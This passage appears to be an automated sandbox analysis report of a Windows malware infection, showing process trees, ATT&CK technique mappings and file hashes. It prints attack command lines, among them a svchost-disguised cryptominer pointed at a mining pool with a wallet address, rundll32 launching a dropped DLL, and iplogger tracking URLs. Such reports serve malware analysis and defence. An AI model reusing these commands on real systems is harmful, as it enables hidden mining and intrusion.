"C:\Users\Admin\Pictures\Adobe Films\vZRazqC1JjHdbGBRX5CY5qkl.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 464
4⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 484
4⤵
PID:5888

C:\Users\Admin\Pictures\Adobe Films\MWtIGmpeRx1i_JRQoRfayaTT.exe
"C:\Users\Admin\Pictures\Adobe Films\MWtIGmpeRx1i_JRQoRfayaTT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5380

C:\Users\Admin\Pictures\Adobe Films\VMK9oluwXQ9gKJjFgBGKpcLY.exe
"C:\Users\Admin\Pictures\Adobe Films\VMK9oluwXQ9gKJjFgBGKpcLY.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4280

C:\Users\Admin\AppData\Local\Temp\E210E.exe
"C:\Users\Admin\AppData\Local\Temp\E210E.exe"
4⤵
- Executes dropped EXE
PID:6608

C:\Users\Admin\AppData\Local\Temp\go-memexec-072329051.exe
C:\Users\Admin\AppData\Local\Temp\go-memexec-072329051.exe
5⤵
- Executes dropped EXE
PID:1340

C:\Users\Admin\AppData\Local\Temp\FI1LI.exe
"C:\Users\Admin\AppData\Local\Temp\FI1LI.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6908

C:\Users\Admin\AppData\Local\Temp\FGG59.exe
"C:\Users\Admin\AppData\Local\Temp\FGG59.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4368

C:\Users\Admin\AppData\Local\Temp\858E3.exe
"C:\Users\Admin\AppData\Local\Temp\858E3.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5684

C:\Users\Admin\AppData\Local\Temp\F913702FJLD3LGI.exe
https://iplogger.org/1OUvJ
4⤵
- Executes dropped EXE
PID:6736

C:\Users\Admin\AppData\Local\Temp\7IG03.exe
"C:\Users\Admin\AppData\Local\Temp\7IG03.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6720

C:\Users\Admin\Pictures\Adobe Films\ki39HJ6ZwIVHm_gigZgUPZS4.exe
"C:\Users\Admin\Pictures\Adobe Films\ki39HJ6ZwIVHm_gigZgUPZS4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 476
4⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 496
4⤵
PID:6860

C:\Users\Admin\Pictures\Adobe Films\F2iBcq7qlXlEsigDUaVqAEtQ.exe
"C:\Users\Admin\Pictures\Adobe Films\F2iBcq7qlXlEsigDUaVqAEtQ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 464
4⤵
PID:6296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 508
4⤵
PID:7156

C:\Users\Admin\Pictures\Adobe Films\e7b5z0g1Rdi0ulaDZW_bVmBa.exe
"C:\Users\Admin\Pictures\Adobe Films\e7b5z0g1Rdi0ulaDZW_bVmBa.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6508

C:\Users\Admin\AppData\Local\Temp\is-VA3NL.tmp\e7b5z0g1Rdi0ulaDZW_bVmBa.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VA3NL.tmp\e7b5z0g1Rdi0ulaDZW_bVmBa.tmp" /SL5="$40376,140518,56832,C:\Users\Admin\Pictures\Adobe Films\e7b5z0g1Rdi0ulaDZW_bVmBa.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6836

C:\Users\Admin\AppData\Local\Temp\is-SD3NI.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-SD3NI.tmp\RYUT55.exe" /S /UID=2710
5⤵
PID:6488

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
6⤵
PID:6332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffea81d46f8,0x7ffea81d4708,0x7ffea81d4718
3⤵
PID:4288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
3⤵
PID:2620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
3⤵
PID:2712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
3⤵
PID:5184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
3⤵
PID:5196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4872 /prefetch:8
3⤵
PID:5716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
3⤵
PID:5820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
3⤵
PID:5832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4464 /prefetch:2
3⤵
PID:5272

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:6164

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,12485306442246805436,6927668072808245983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
3⤵
PID:3496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4556 -ip 4556
1⤵
PID:4316

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 604
3⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556
1⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3332 -ip 3332
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4556 -ip 4556
1⤵
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4556 -ip 4556
1⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4556 -ip 4556
1⤵
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4556 -ip 4556
1⤵
PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4556 -ip 4556
1⤵
PID:2824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4556 -ip 4556
1⤵
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4556 -ip 4556
1⤵
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4556 -ip 4556
1⤵
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4556 -ip 4556
1⤵
PID:3316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4556 -ip 4556
1⤵
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4556 -ip 4556
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4556 -ip 4556
1⤵
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4556 -ip 4556
1⤵
PID:4212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4556 -ip 4556
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4556 -ip 4556
1⤵
PID:1852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4556 -ip 4556
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4556 -ip 4556
1⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4556 -ip 4556
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4556 -ip 4556
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1848 -ip 1848
1⤵
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1848 -ip 1848
1⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1848 -ip 1848
1⤵
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1848 -ip 1848
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1848 -ip 1848
1⤵
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1848 -ip 1848
1⤵
PID:1776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1848 -ip 1848
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1848 -ip 1848
1⤵
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1848 -ip 1848
1⤵
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1848 -ip 1848
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1848 -ip 1848
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1848 -ip 1848
1⤵
PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1848 -ip 1848
1⤵
PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1848 -ip 1848
1⤵
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1848 -ip 1848
1⤵
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1848 -ip 1848
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5348 -ip 5348
1⤵
PID:5664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5348 -ip 5348
1⤵
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5348 -ip 5348
1⤵
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5348 -ip 5348
1⤵
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5348 -ip 5348
1⤵
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5348 -ip 5348
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5348 -ip 5348
1⤵
PID:860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5348 -ip 5348
1⤵
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5348 -ip 5348
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5348 -ip 5348
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5348 -ip 5348
1⤵
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5348 -ip 5348
1⤵
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5348 -ip 5348
1⤵
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5348 -ip 5348
1⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5348 -ip 5348
1⤵
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5348 -ip 5348
1⤵
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5348 -ip 5348
1⤵
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5348 -ip 5348
1⤵
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5348 -ip 5348
1⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5348 -ip 5348
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5348 -ip 5348
1⤵
PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5348 -ip 5348
1⤵
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5348 -ip 5348
1⤵
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5348 -ip 5348
1⤵
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5348 -ip 5348
1⤵
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5148 -ip 5148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4788 -ip 4788
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4156 -ip 4156
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5304 -ip 5304
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5380 -ip 5380
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5292 -ip 5292
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5380 -ip 5380
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 5828
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2364 -ip 2364
1⤵
PID:7092

C:\Windows\SysWOW64\mtdbqc\loedwyfi.exe
C:\Windows\SysWOW64\mtdbqc\loedwyfi.exe /d"C:\Users\Admin\Pictures\Adobe Films\fZUCD3AXYtPe3U3cgu57MhaF.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1916

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:4756

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
3⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 552
2⤵
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5348 -ip 5348
1⤵
PID:6592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1916 -ip 1916
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4156 -ip 4156
1⤵
PID:6504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5304 -ip 5304
1⤵
PID:6200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4788 -ip 4788
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5292 -ip 5292
1⤵
PID:2168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5348 -ip 5348
1⤵
PID:6304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 732 -ip 732
1⤵
PID:2060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5552

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
b8c8a5284555767228f813fa7c69c7a1

SHA1
c4cbc730531283eb376470584f9a3b62f32963fd

SHA256
6575efb1d53b793e9750056e788b1df25287fc6f526da75a90c0e79be9987aaa

SHA512
1526dc24c5842acbe6d048bcba70a656449f1d86c798c0aebbb3e7d57f785e285f710548dcb1e7a6da5e180f31e7e0d69d9b5071b8fc60b1b2be31c50ffb8147

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
